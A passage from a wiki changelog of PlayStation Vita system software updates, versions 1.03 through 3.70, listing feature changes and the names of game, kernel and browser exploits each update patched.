*A savegame exploit in an undisclosed PSP game has been fixed.<br />
*The PSP Emulator of the PS Vita has been updated to PSP firmware 6.61.<br />
|-<br />
|align=center|'''3.50'''<br />March 26, 2015<br />
|<br />
;System<br />
*Adds support for streaming in 60 frames per second while using PS4 Remote Play. If 60fps is enabled, the PS4 system will be unable to record gameplay while using Remote Play.<br />
*Accessibility has been added to the settings menu, with options such as zooming, inverted colors, closed captions, enlarged text and increased contrast options.<br />
*The Maps application has been removed.<br />
*[near] no longer shows Maps and other related content.<br />
*PSN has been renamed to PlayStation Network.<br />
*The [Chat] setting under [PlayStation Network] > [Sub Account Management] has been renamed as [Chat/User-Generated Media].<br />
*Sub account users can now be restricted from sending and receiving [Messages from other players] in [Messages].<br />
*The online-status of friends is no longer shown with a pop-up box.<br />
*Fixed savedata exploits in various PSP games (Arcade Darts, Patapon 2, Numblast, etc.).<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<br />
*30% of the 256 MB of memory reserved for the operating system is now free for games.<br />
|-<br />
|align=center|'''3.51'''<br />May 13, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Additional fixes for the "custom bubble" exploit.<br />
*Fixes lag some users reported on the home screen of the system.<br />
|-<br />
|align=center|'''3.52'''<br />June 23, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Revoked PlayStation Mobile.<ref name="Rejuvenate">http://wololo.net/2015/06/24/ps-vita-firmware-3-52-is-out-revokes-psm-support-effectively-patching-the-rejuvenate-hack-do-not-update/</ref><br />
*Fixed the "Rejuvenate" exploit.<ref name="Rejuvenate" /><br />
|-<br />
|align=center|'''3.55'''<ref>https://web.archive.org/web/20150930182904/https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />September 30, 2015<br />
|<br />
;System<br />
*Fixed the Mail Writer exploit.<ref name="Fail-Mail">http://wololo.net/2015/09/30/playstation-vita-firmware-3-55-is-now-available-does-it-patch-the-fail-mail-flaw/</ref><br />
*Fixes several PSP usermode exploits.<ref name="Fail-Mail" /><br />
;PS4 Link<br />
*You can now adjust the setting for video resolution when using remote play on a PS Vita system. Select (PS4 Link) > [Start] > (Options) > [Settings] > [Video Quality for Remote Play] > [Resolution]. <br />
** If video or audio skips during playback, try selecting [Low (360p)] to help improve the quality.<br />
;Parental Controls<br />
*You can now restrict [Email] from starting.<br />
|-<br />
|align=center|'''3.57'''<ref>http://gematsu.com/2016/01/ps3-ps-vita-ending-facebook-link-support</ref><br />January 20, 2016<br />
|<br />
;System<br />
*Removed the system-wide Facebook integration.<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<ref>http://wololo.net/2016/01/20/playstation-vita-system-software-3-57-is-now-available-fixes-currently-testing/</ref><br />
|-<br />
|align=center|'''3.60'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />April 6, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
|-<br />
|align=center|'''3.61'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />August 8, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
*Fixed <code>sceIoDevctl</code> uninitialized stack memory leak used by HENkaku.<br />
*Fixed WebKit <code>JSArray::sortCompactedVector</code> vulnerability used by HENkaku.<br />
|-<br />
|align=center|'''3.63'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />November 1, 2016<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
*Fixed <code>sceNetIoctl</code> use-after-free used by HENkaku.<br />
|-<br />
|align=center|'''3.65'''<br />April 18, 2017<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Fixed PSP emulator kernel exploit used by ARK.<br />
|-<br />
|align=center|'''3.67'''<br />November 28, 2017<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
<hr><br />
*Twitter dialog updated.<br />
*Calendar icon updated.<br />
*Added TLS 1.2 support in the web browser.<br />
*Fixed Ensō exploit.<br />
|-<br />
|align=center|'''3.68'''<br />April 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Minor WebKit update (vector index masking).<ref name="WebKit-368">https://gist.github.com/StepS-/436098ac8979217d263bab2edab11ee5</ref><br />
*Fixed some devkit-specific kernel bugs.<ref name="DevKit-367">[https://twitter.com/theflow0/status/985137344570372096 Sony has fixed 3 kernel bugs in 3.68, which combined, could lead to kernel code execution on a devkit]. TheFloW (@theflow0) on Twitter</ref><ref name="DevKit-367-sceMotionDevGetEvaInfo">[https://twitter.com/theflow0/status/984919058863845378 sceMotionDevGetEvaInfo could leak 0x48 bytes of kernel stack]. TheFloW (@theflow0) on Twitter</ref><br />
|-<br />
|align=center|'''3.69'''<br />September 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Fixed some bugs in SceNgs.<br />
*SSL library updated (along with other networking libraries that use SceSsl); two new root certificates added.<br />
|-<br />
|align=center|'''3.70'''<br />January 14, 2019<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Changed the enc key<br />
*Forgot to change any other keys. Oops!<br />
|-<br />
|}<br />
<br />
[[Category:Firmware]]</div>Xyz
http://wiki.henkaku.xyz/vita/index.php?title=System_Software&diff=9926 System Software 2019-01-15T03:17:04Z<p>Xyz: </p>
<hr />
<div>== History of updates ==<br />
Originally taken from [https://en.wikipedia.org/w/index.php?title=PlayStation_Vita_system_software&oldid=746007330 Wikipedia].<br />
<br />
=== Version 1 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''1.03'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.04'''<br />December 17, 2011<br />
|<br />
* Provided only with Shin Kamaitachi no Yoru: 11 Hitome no Suspect<br />
|-<br />
|align=center|'''1.05'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.06'''<br />February 15, 2012<br />
|<br />
* EU release firmware<br />
* US First Edition Bundle release firmware<br />
|-<br />
|align=center|'''1.50'''<br />December 17, 2011<br />
|<br />
;System<br />
* Support for the PlayStation Vita cradle.<br />
|-<br />
|align=center|'''1.51'''<br />December 27, 2011<br />
|<br />
;System<br />
* Addresses freezing issues with certain games.<br />
|-<br />
|align=center|'''1.52'''<br />January 16, 2012<br />
|<br />
;System<br />
*Improved system stability.<br />
*The 1.51 bug where the 3G/Wi-Fi SKU would not recognize a SIM card has been fixed.<ref>http://www.theverge.com/gaming/2012/1/16/2712066/playstation-vita-updated-to-version-1-52-in-japan-fixes-3g-sim</ref><br />
|-<br />
|align=center|'''1.60'''<ref>http://play-beyond.net/2012/02/08/ps-vita-system-update-1-60-full-change-log/</ref><br />February 8, 2012<br />
|<br />
;Apps<br />
*An application powered by Google Maps has been added.<br />
<br />
;Near<br />
*In [near], information about players is now displayed on the [Discoveries] screen.<br />
<br />
;Content Manager<br />
*Users can now delete backup files in [Content Manager].<br />
<br />
;Photos<br />
*Users can now record video under the [Photos] application.<br />
<br />
;System<br />
*The PS button will now flash blue while the battery is charging.<br />
*In [Settings], the position where [Flight Mode] appears has been changed.<br />
*You can now publish stories about the products that you rate in PlayStation Store to Facebook.<br />
*You can now report inappropriate messages in [Group Messaging] and inappropriate comments about an activity.<br />
*“PlayStation Network account” has been renamed to “Sony Entertainment Network account”.<br />
|-<br />
|align=center|'''1.61'''<ref>http://blog.us.playstation.com/2012/02/20/ps-vita-system-software-update-v1-61</ref><br />February 21, 2012<br />
|<br />
;System<br />
*Improves certain aspects of the system software.<br />
*Fixed [[Vulnerabilities#Syscall_handler_doesn.27t_check_syscall_number|SVC table overflow vulnerability]]. (Pretty sure this is the version they fixed it in [[User:Xyz|Xyz]] ([[User talk:Xyz|talk]]) 04:24, 19 April 2017 (UTC))<br />
|-<br />
|align=center|'''1.65'''<ref>http://blog.us.playstation.com/2012/04/02/ps-vita-system-software-update-v1-65</ref><br />April 3, 2012<br /><small>''Replaced with 1.66''</small><br />
|<br />
;System<br />
* [Notification Alert] has been added to [Settings], allowing users to toggle alerts on and off.<br />
* [After 10 Minutes] has been added to time options under [Power Save Settings].<br />
* Caps Lock is now supported in the On Screen Keyboard.<br />
* An arrow icon will now display when PS Vita finds new activities in the LiveArea.<br />
* Addition of installation progress bar for downloaded games and DLC.<br />
* minis with a pre-set expiry date (such as those obtained via PlayStation Plus) now load correctly.<br />
* Fixes security issues with two PSP games that allowed users to run unauthorized content on the device through an exploit.<ref>http://wololo.net/wagic/2012/04/04/ps-vita-firmware-update-1-66-available/</ref> <br />
|-<br />
|align=center|'''1.66'''<ref>http://www.engadget.com/2012/04/04/playstation-vita-1-66-firmware-update/</ref><br />April 4, 2012<br />
|<br />
;System<br />
* Fixed problems which appeared in 1.65.<br />
* [Settings]<br />
* The [System Music] setting in [Settings] > [Sound and Display] now affects background music in [PS Store], [near], the Sign-Up screens, and the Home menu.<br />
* The display time of notification alerts has been reduced from 5 seconds to 3 seconds.<br />
* Functional improvements have been made in the following games and applications: Unit 13, Gravity Daze, near.<br />
<br />
;Near<br />
* When searching for location data, users now have the option to [Retry] and [Cancel] when a failure occurs.<br />
* A direct link to [PS Store] is made available for new applications that users may discover on [near].<br />
* Users can now update data at any time within [near], provided they are within the same location.<br />
|-<br />
|align=center|'''1.67'''<ref>http://exophase.com/36431/ps-vita-firmware-1-67-goes-live/</ref><br />April 11, 2012<br />
|<br />
;System<br />
* Resolves an issue with the camera functionality when playing ''Dream Club Zero Portable''.<ref>http://www.jp.playstation.com/psvita/update/</ref> <br />
|-<br />
|align=center|'''1.69'''<ref>http://blog.us.playstation.com/2012/06/11/ps-vita-at-e3-minor-system-software-update-coming/</ref><br />June 11, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Improved system stability.<br />
* A savegame exploit within Super Collapse 3 has been patched, disallowing the usage of VHBL via the game.<ref>12 June 2012, [http://wololo.net/2012/06/12/ps-vita-firmware-1-69-patches-the-super-collapse-3-exploit/ PS Vita Firmware 1.69 patches the Super Collapse 3 exploit], Wololo.net</ref><br />
* Resolves a compatibility issue with the PlayStation Portable game ''Conception: Ore no Kodomo wo Undekure!''.<ref>http://andriasang.com/con1f1/conception_firmware/</ref> <br />
|-<br />
|align=center|'''1.691'''<br />July 4, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Resolves a compatibility issue with the PS Vita demo for ''Escape Plan''.<br />
|-<br />
|align=center|'''1.80'''<ref>[http://blog.us.playstation.com/2012/08/14/psone-classics-coming-to-ps-vita-via-the-latest-system-software-update-v1-80/ PSone Classics Coming to PS Vita via the latest System Software Update (v1.80) – PlayStation.Blog]. Blog.us.playstation.com (2012-08-14). Retrieved on 2013-08-23.</ref><br />August 28, 2012<br />
|<br />
;System<br />
* Users can now control the home screen, as well as some applications like [Music] and [Video], with the PS Vita system's buttons.<br />
* Notification settings under [Sound & Display Settings] have been moved to their own [Notification Settings] menu.<br />
* The items under [Date & Time] > [Date & Time Settings] have been changed.<br />
* A Japanese keyboard has been added.<br />
* Memory cards are now locked to PSN accounts, to prevent users from switching between accounts. The system will refuse to accept a memory card locked to another account unless the memory card is reformatted.<ref>http://i.imgur.com/4nsEl.jpg</ref><br />
* The layout of category lists has been improved in [Photos], [Music], and [Videos].<br />
* The [Notification Center] has been redesigned.<br />
* Importing content from a PC or PlayStation 3 has been improved.<br />
* The [Help] feature of the LiveArea has been improved.<br />
* Icons for some menu items have been changed.<br />
* Users can now report some errors to Sony Computer Entertainment.<br />
* Background colors have been changed.<br />
* Fixed a [[Vulnerabilities#Stack_buffer_overflow_in_sceSblDmac5EncDec|stack buffer overflow in sceSblDmac5EncDec]] and numerous other vulnerabilities.<br />
<br />
;Remote Play<br />
* Added [Cross-Controller] feature to allow the PS Vita system to interact as a secondary controller with a PlayStation 3 system.<br />
<br />
;Games<br />
* Users can now play select PSone Classics from the PlayStation Store.<br />
* Users can now map more combinations of PSP system buttons to the PS Vita right analog stick when playing PSP games or minis. In addition, users can also map a PSP system button to each of the four corners of the PS Vita system touch screen.<br />
* [Import Saved Data] has been added to the LiveArea screen. This will only be shown for games that support this feature.<br />
<br />
;Photos<br />
* The MPO format can now be viewed on the PS Vita system. Additionally, MPO files can now be transferred from a PlayStation 3 or PC via Content Manager. 3D and multi-angle viewing are not supported.<br />
<br />
;Music<br />
* Playlists in iTunes (10.6.3 or later), M3U, and M3U8 formats are now supported in [Music].<br />
* Playlists can also be transferred from a PS3 system.<br />
<br />
;Videos<br />
* Playback speed control and repeat play have been added to [Video].<br />
* When moving the progress bar during video playback, it now shows the image of the specified location in the video.<br />
* A thumbnail for videos will now be generated automatically when there is no thumbnail information available.<br />
* Users can now copy photos or videos to a PC or PS3 while a photo or video is displayed.<br />
<br />
;Friends<br />
* Users can now delete multiple friend requests simultaneously.<br />
<br />
;Near<br />
* [near] can now gather information about surrounding Wi-Fi access points without an Internet connection and will update location data based on this information at a later time.<br />
* The LiveArea screen for [near] has been improved and now shows lifetime statistics.<br />
<br />
;Group Messaging<br />
* There have been layout improvements made to [Group Messaging].<br />
* Users can now take photos using the camera to add as attachments in [Group Messaging].<br />
* The [New Message] button on the [Group Messaging] LiveArea screen has been removed.<br />
<br />
;Maps<br />
* [Maps] has been improved by adding a button to the top of the screen to switch between [Search for Location] and [Search for Directions]. Users can also touch and hold a location on the map to place a flag.<br />
<br />
;Browser<br />
* The use of the rear touchpad for scrolling and zooming is now supported in the [Browser].<br />
* Users are no longer able to use a JavaScript bookmark trick to download YouTube videos in the [Browser].<br />
* A button has been added to the [Browser] to immediately go to the top of the page.<br />
<br />
;Party<br />
* Users can now view a history of up to 100 chat messages and information in [Party].<br />
|-<br />
|align=center|'''1.81'''<ref>[https://twitter.com/PlayStation/status/247851681428164609 Twitter / PlayStation: PS Vita system software update]. Twitter.com. Retrieved on 2013-08-23.</ref><br />September 17, 2012<br />
|<br />
;System<br />
* Software stability has been improved.<br />
* A savegame exploit within Monster Hunter Freedom Unite has been patched, disallowing the usage of VHBL via the game.<ref>18 September 2012, [http://wololo.net/2012/09/18/vita-firmware-1-81-is-out-patches-vhbl/ Vita Firmware 1.81 is out, patches VHBL], Wololo.net</ref><br />
<br />
;Treasure Park<br />
* An issue was resolved where the game would fail to load properly if the user had received too many treasure sheets.<br />
|-<br />
|}<br />
<br />
=== Version 2 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''2.00'''<ref>[http://blog.us.playstation.com/2012/11/13/playstation-plus-for-ps-vita-available-next-week-take-the-tour/ PlayStation Plus for PS Vita Available Next Week – Take the Tour – PlayStation.Blog]. Blog.us.playstation.com (2012-11-13). Retrieved on 2013-08-23.</ref><br />November 19, 2012<br />
|<br />
;System<br />
* System buttons can now be used in more applications.<br />
* Turkish has been added as a system language.<br />
* In [Settings], users can now set how they will be alerted depending on the type of notification.<br />
* [Disconnect Wi-Fi Connection Automatically] has been added to [Network] > [Wi-Fi Settings].<br />
* [PlayStation Network]<br />
** Support for PlayStation Plus has been added.<br />
** Users can now connect their PlayStation Network account to Twitter.<br />
** [Avatar], [Panel], [Online ID], [About Me] and [My Languages] under [PlayStation Network] > [Account Information] have been moved to the new category [Profile].<br />
* [PlayStation Mobile] has been added under [System].<br />
* Screenshots are now saved in the background.<br />
* Trophy synchronization is now performed in the background.<br />
* A savegame exploit within Urbanix has been patched.<br />
* Users can now delete screenshots or songs from PlayStation Portable games.<br />
<br />
;Content Manager<br />
* [Content Manager] has been redesigned.<br />
* Users can now transfer content to and from PlayStation Plus online storage, to and from a PS3, and to and from a PC via Wi-Fi.<br />
<br />
;Browser<br />
* The rendering engine has been improved.<br />
* The [Browser] now uses additional GPU processing power.<br />
* Tapping on a YouTube link will now open the respective video in the YouTube app.<br />
* The HTML5 and JavaScript engines have been upgraded.<br />
* Users can now send their current [Browser] URL using their Twitter settings.<br />
* Users can now access the [Browser] while in an application or game.<ref>Shuhei Yoshida on Twitter. https://twitter.com/yosp/status/270429820712783872</ref><br />
* A pointer can now be used (in conjunction with pressing L or R and tapping on the screen) to select links.<br />
<br />
;Apps<br />
* [Email] has been added as an application.<br />
<br />
;Maps<br />
* [Maps] can now display weather information for locations where it is available.<br />
<br />
;Near<br />
* The layout of [Near] has been revised.<br />
<br />
;Friends<br />
* The activities list for Friends has been moved to the LiveArea screen.<br />
* Users can now attach a comment when sending a friend request.<br />
* Users can now file a [Grief Report] for inappropriate comments when sent with a friend request.<br />
* TIFF, BMP, PNG, GIF, and MPO are now supported as file formats in [Group Messaging].<br />
<br />
;Videos<br />
* The PS Vita system can now play videos with 1080p resolution.<br />
* Videos can now display captioning.<br />
* Videos can now be played in slow motion.<br />
* Users can now skip chapters in videos.<br />
* Folders can now be transferred from a PS3 or PC to the PS Vita for [Photos] and [Videos].<br />
* When browsing lists in Music and Videos, titles will now scroll horizontally if they are too long.<br />
<br />
;PSone Classics<br />
* [Assign Touchscreen] and [Assign Rear Touch Pad] have been added to [Controller Settings].<br />
* [Custom] has been added to [Other Settings] > [Screen Mode].<br />
|-<br />
|align=center|'''2.01'''<ref>[http://www.playstationlifestyle.net/2012/12/03/ps-vita-firmware-v2-01-is-live-download-now/ PS Vita Firmware v2.01 is Live, Download Now]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 3, 2012<br />
|<br />
;PlayStation Plus<br />
* Issue with the [Upload Automatically] setting for saved data has now been corrected.<br />
<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.02'''<ref>[http://www.playstationlifestyle.net/2012/12/18/playstation-vita-system-software-version-2-02-now-available-for-download/ PlayStation Vita System Software Version 2.02 Now Available For Download]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 19, 2012<br />
|<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.05'''<ref>[http://www.playstationlifestyle.net/2013/01/22/ps-vita-system-software-version-2-05-likely-coming-today-seems-to-be-mandatory/ PS Vita System Software Version 2.05 Likely Coming Today, Seems to be Mandatory]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><br />January 24, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes an exploit in the PSP game UNO.<br />
|-<br />
|align=center|'''2.06'''<ref>[https://twitter.com/PlayStation/status/311264776577765376 Twitter / PlayStation: Heads up - PS Vita v2.06 software]. Twitter.com. Retrieved on 2013-08-23.</ref><br />March 12, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes an exploit in the PSP game Dissidia Duodecim.<br />
* Closes a JavaScript address-bar spoofing vulnerability in the [Browser].<ref>[http://www.securityfocus.com/archive/1/525576 Sony Playstation Vita Browser - firmware 2.05 - Adressbar spoofing]. Securityfocus.com. Retrieved on 2013-12-09.</ref><br />
|-<br />
|align=center|'''2.10'''<ref>[http://blog.us.playstation.com/2013/04/09/ps-vita-system-software-update-v-2-10/ PS Vita System Software Update (v.2.10) – PlayStation.Blog]. Blog.us.playstation.com (2013-04-09). Retrieved on 2013-08-23.</ref><ref>[http://uk.playstation.com/psvita/support/system-software/detail/item596991/Update-features-%28ver-2-10%29/ Update features (ver 2.10) - PS Vita System Software]. Uk.playstation.com. Retrieved on 2013-08-23.</ref><br />April 9, 2013<br />
|<br />
;System<br />
* Users can now create folders, with a maximum of 10 icons per folder, and up to 100 icons (including folders) on the home screen.<br />
* Users can now verify which PS Vita card is in their system by looking at the information bar.<br />
* Users can now save home screen layouts per PS Vita card.<br />
* When [Mute Automatically] is toggled in [Settings], the PS Vita will mute speakers when a headset is unplugged. Similarly, music will now pause if a headset is unplugged when the music app is used.<br />
* [Use Wi-Fi in Power Save Mode] has been added to [Power Save Settings].<br />
* [Disconnect Wi-Fi Connection Automatically] has been removed.<br />
* Patches an exploit in the game Apache Overkill.<ref>10 April 2013, [http://wololo.net/2013/04/10/mandatory-vita-2-10-update-live-and-blocks-apache-overkill-exploit/ Mandatory Vita 2.10 Update Live and Blocks Apache Overkill Exploit], Wololo.net</ref><br />
<br />
;PlayStation Plus<br />
* PlayStation Plus members can now automatically update [PlayStation Mobile] software and upload game save data using a 3G connection.<br />
* Users can now upload or download game save data using a 3G network.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been added (a memory card is required; some videos are not supported).<br />
<br />
;Email<br />
* Enhancements to [Email] now allow users to view HTML messages, add multiple email addresses to contacts, and search messages.<br />
<br />
;Group Messaging<br />
* Users can now send messages to multiple recipients.<br />
<br />
;Photos<br />
* Still images can now be displayed in high resolution when zoomed in.<br />
<br />
;Content Manager<br />
* Users can now check for system updates when plugging their PS Vita into their PS3 system. The system version of the PS3 must be 4.40 or higher.<br />
* Users can now add a name for the PS Vita backup data when saving to a PS3 or PC. The system version of the PS3 must be 4.40 or higher, and the Content Manager Assistant application must be updated.<br />
<br />
;PlayStation Store<br />
* When reporting PlayStation Mobile content as inappropriate, users can now include details.<br />
|-<br />
|align=center|'''2.11'''<ref>[http://www.psu.com/a019092/PS-Vita-firmware-211-is-now-live [UPDATE&#93; PS Vita firmware 2.11 is now live - PlayStation Universe]. Psu.com (2013-04-16). Retrieved on 2013-08-23.</ref><br />April 16, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
* Stabilizes the playback of certain titles.<br />
|-<br />
|align=center|'''2.12'''<ref>[http://terminalgamer.com/2013/05/07/optional-ps-vita-system-update-2-12-live-now/ Optional PS Vita System Update 2.12 Live Now]. Terminal Gamer (2013-05-08). Retrieved on 2013-08-23.</ref><br />May 8, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
|-<br />
|align=center|'''2.50'''<br />''Pre-installed Only''<br><br />
First found on October 10, 2013<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PCH-2000 model.<br />
*It adds support for PlayStation Vita Slim (PCH-2000), but otherwise the firmware is identical to the previous version (2.12).<br />
|-<br />
|align=center|'''2.60'''<ref>[http://www.playstationlifestyle.net/2013/08/05/ps-vita-firmware-update-v2-60-released-download-now/ PS Vita Firmware Update v2.60 Released, Download Now]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><ref>[http://wololo.net/2013/08/06/psvita-mandatory-ofw-2-60-now-live/ PSVITA Mandatory OFW 2.60 Now Live ·]. Wololo.net (2013-08-06). Retrieved on 2013-08-23.</ref><br />August 5, 2013<br />
|<br />
* Default release firmware for the PlayStation Vita TV in Japan.<br />
;System<br />
* [Devices] has been added under [Settings].<br />
** [Bluetooth Settings] has been moved to [Devices].<br />
* The Quick Access Menu when the PS button is held has been improved.<br />
* Stability improvements.<br />
* Anti-aliasing has been applied to home screen icons.<br />
* Closes an exploit in Gamocracy One: Legend of Robot.<br />
* Closes a previously undisclosed exploit in Pool Hall Pro.<br />
* Fixes screenshot compression bug for ''Gravity Rush'' and ''Everybody's Golf'' introduced in firmware 2.10.<br />
<br />
;LiveArea<br />
* The LiveArea for [Content Manager] and [Photos] has been updated.<br />
<br />
;PlayStation Plus<br />
* A [PlayStation Plus] icon has been added to the LiveArea to allow users to easily upload or download saved data.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been extended.<br />
<br />
;Content Manager<br />
* Users can now use content on a remote system before transferring it.<br />
<br />
;Trophies<br />
* Trophies can now be hidden.<br />
|-<br />
|align=center|'''2.61'''<ref>[http://www.playstationlifestyle.net/2013/08/28/ps-vita-system-firmware-update-v2-61-coming-soon-improves-some-software-stability/ PS Vita System Firmware Update v2.61 Coming Soon, Improves Some Software]. PlayStation LifeStyle. Retrieved on 2013-08-28.</ref><br />August 28, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within Arcade Darts and other games has been patched, disallowing the usage of VHBL via the game.<ref>29 August 2013, [http://wololo.net/2013/08/29/ps-vita-compulsory-firmware-2-61-is-out-patches-the-arcade-exploits/ PS Vita compulsory Firmware 2.61 is out, patches the ‘Arcade’ exploits], Wololo.net</ref><br />
|-<br />
|}<br />
<br />
=== Version 3 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''3.00'''<br />November 5, 2013<br />
|<br />
;System<br />
* [Parental Controls] has been added to the home screen.<br />
* Future system software updates can now be downloaded automatically.<br />
* Portuguese (Portugal) language has been updated to reflect changes due to the Portuguese Language Orthographic Agreement of 1990.<br />
* System stability has been improved.<br />
* Several PSP game exploits, in Fieldrunners and other titles that had not been publicly disclosed, have been patched, disallowing the usage of VHBL via these games.<ref>11 November 2013, [http://wololo.net/2013/11/11/sony-patched-up-to-20-exploits-with-vita-firmware-3-00/ Sony patched up to 20 exploits with Vita firmware 3.00], Wololo.net</ref><br />
<br />
;Trophies<br />
* Trophies for PS4 software can now be displayed on PS Vita.<br />
<br />
;Content Manager<br />
* Users can now transfer content to and from a PS3 with Wi-Fi on the same network, when the PS3 is version 4.50 or newer.<br />
<br />
;Messages<br />
* [Group Messaging] has been renamed to [Messages].<br />
* The icon has been changed.<br />
* Messages can now be sent to and from the PS4 and mobile devices running the PlayStation App.<br />
<br />
;Email<br />
* Contacts can now be synchronized from Gmail and Yahoo! Mail using CardDAV.<br />
<br />
;Party<br />
* The icon has been changed.<br />
* Users can now voice and text chat with friends on PS4.<br />
<br />
;Remote Play<br />
* [Remote Play] has been renamed to [PS3 Remote Play].<br />
<br />
;PS4 Link<br />
* [PS4 Link] has been added to the home screen.<br />
<br />
;Friends<br />
* The layout for the [Friends] application has changed. There are now four tabs available:<br />
** Find Player on PSN<br />
** Friends<br />
** Friend Requests<br />
** Players Blocked<br />
<br />
;Photos<br />
* Users can now take panoramic photos with the PS Vita's camera.<br />
* Panoramic photos can be viewed using the system's motion sensor.<br />
|-<br />
|align=center|'''3.01'''<ref name="PSVita301">[http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits]. Wololo.net. Retrieved on 2013-12-10.</ref><br />December 5, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within several games has been patched, disallowing the usage of VHBL/eCFW via the games.<ref>10 December 2013, [http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits], Wololo.net</ref><br />
|-<br />
|align=center|'''3.10'''<ref name="PSVita310">[http://blog.eu.playstation.com/2014/03/25/playstation-vita-system-software-update-3-10-coming-soon/ PS Vita System Software Update 3.10 Coming Soon]. PlayStation Blog. Retrieved on 2014-03-25.</ref><br />March 25, 2014<br />
|<br />
;System<br />
* The number of applications that can be displayed on the home screen has increased to 500.<br />
* [Adjust Daylight Savings Automatically] has been added.<br />
* [30 minutes] has been added to [Enter Standby Mode Automatically].<br />
* (''Japan only'') PocketStation functionality has been integrated into the system software.<ref name=fami310>2014-03-25, [http://www.famitsu.com/news/201403/25050481.html PS Vita、PS Vita TVのシステムソフトウェア バージョン3.10が提供開始、カレンダー機能追加など盛りだくさん!], Famitsu</ref><br />
* Added DualShock 4 compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Added PlayStation Mobile compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Use of an [External Keyboard] is now supported (for example, PlayStation Bluetooth Wireless Keypad).<br />
* Savegame exploits in various publicly known exploit titles have been patched.<br />
* Savegame exploits in various additional, previously undisclosed titles have been patched as well.<br />
* Internal firmware changes now prevent larger payloads (e.g. the TN-V and ARK eCFWs) from being executed via exploits in PSP Minis that lack network functionality.<br />
<br />
;Apps<br />
* Added a new [Calendar] application that synchronizes with Google Calendar.<br />
<br />
;Content Manager<br />
* Added [Manage Content on Memory Card] option.<br />
<br />
;Messages<br />
* Messages sent and received now include voice messages.<br />
<br />
;Parental Controls<br />
* Access to the PS Store can now be restricted.<br />
* Added a children's age guide.<br />
<br />
;Music<br />
* Users can now search on connected devices such as a PC.<br />
<br />
;Video<br />
* Users can now sort content by size.<br />
<br />
;Photo<br />
* [Rotate Screen Automatically] has been added.<br />
* [Freeform] has been added to the list of panoramic options.<br />
|-<br />
|align=center|'''3.12'''<ref name="PSVita312">[http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/ PS Vita mandatory firmware 3.12 available – Fixes memory card problems]. Wololo.net. Retrieved on 2014-03-28.</ref><br />March 28, 2014<br />
|<br />
;System<br />
* System software stability during use of some features has been improved.<br />
* Fixes problems with larger memory cards that were introduced in system software 3.10.<ref>http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/</ref><br />
|-<br />
|align=center|'''3.15'''<br />April 30, 2014<br />
|<br />
;System<br />
* ''(PS Vita TV only)'' Full functionality for PlayStation Vita TV remote play with PS4 systems added.<ref>2014-04-17, [http://www.famitsu.com/news/201404/17051793.html PS4“システムソフトウェア バージョン1.70”の内容が公開、ニコニコ生放送や各配信サービス内の動画アーカイブへの対応、HDCP信号オフなど], Famitsu</ref><ref>2014-04-17, [http://weekly.ascii.jp/elem/000/000/214/214642/ PS4がバージョン1.70へのアップデートでニコ生HD配信などに対応!], Weekly ASCII</ref><br />
* Savegame exploits in various undisclosed exploit titles have been fixed.<ref>http://wololo.net/2014/04/30/ps-vita-firmware-3-15-is-now-available/</ref><br />
<br />
; PS4 Link<br />
* Linking PS Vita with PS4 is now easier.<br />
|-<br />
